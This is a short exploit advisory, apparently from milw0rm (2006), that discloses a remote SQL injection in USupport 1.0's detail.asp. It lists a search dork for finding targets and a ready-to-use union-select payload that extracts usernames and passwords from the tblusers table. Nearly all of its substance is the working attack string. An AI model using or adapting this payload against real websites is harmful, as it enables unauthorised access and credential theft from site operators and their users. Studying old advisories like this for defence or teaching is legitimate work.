22 lines
No EOL
547 B
Text
22 lines
No EOL
547 B
Text
*******************************************************************************
|
|
# Title : USupport 1.0 (detail.asp) Remote SQL Injection Vulnerability
|
|
# Author : ajann
|
|
# Vendor: http://www.superfreaker.com/
|
|
# Dork : UPublisher
|
|
|
|
|
|
*******************************************************************************
|
|
|
|
###http://[target]/[path]//detail.asp?id=[SQL]
|
|
|
|
Example:
|
|
|
|
//detail.asp?id=11%20union%20select%200,username,password,0,0,0%20from%20tblusers
|
|
|
|
"""""""""""""""""""""
|
|
# ajann,Turkey
|
|
# ...
|
|
|
|
# Im not Hacker!
|
|
|
|
# milw0rm.com [2006-11-12] |